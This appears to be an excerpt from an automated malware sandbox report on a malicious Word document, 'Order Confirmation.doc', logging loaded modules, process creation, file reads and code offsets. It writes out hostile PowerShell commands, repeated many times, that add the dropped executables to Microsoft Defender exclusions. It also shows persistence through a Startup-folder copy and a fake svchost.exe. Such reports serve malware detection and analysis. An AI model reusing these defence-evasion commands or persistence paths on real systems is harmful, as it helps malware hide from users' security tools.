                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\AppData\Roaming\srt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\srt.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Order Confirmation.docVirustotal: Detection: 25%
                      Source: Order Confirmation.docReversingLabs: Detection: 34%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: unknownProcess created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: unknownProcess created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe'
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\srt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2113313846.000000000569D000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbV source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdbB source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2102864074.0000000002B00000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2158336320.00000000053A0000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: srt.exe.2.drStatic PE information: 0x8CF7700A [Sat Dec 10 23:45:14 2044 UTC]
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_00D726D5 push ss; retn 0006h3_2_00D726F0
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_002E2015 push ebx; retf 3_2_002E2052
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_01F738D3 push ebx; retf 4_2_01F73FE4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0286385D pushfd ; retf 0071h10_2_02863881
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_009026D5 push ss; retn 0006h12_2_009026F0
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00D726D5 push ss; retn 0006h24_2_00D726F0
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00361B78 push esp; retf 000Ch24_2_00361B81
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_028411A3 push F3C28CC5h; retn 56F3h25_2_02841202
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_02B708B2 pushfd ; ret 25_2_02B708D4
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 29_2_00A026D5 push ss; retn 0006h29_2_00A026F0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_009026D5 push ss; retn 0006h31_2_009026F0
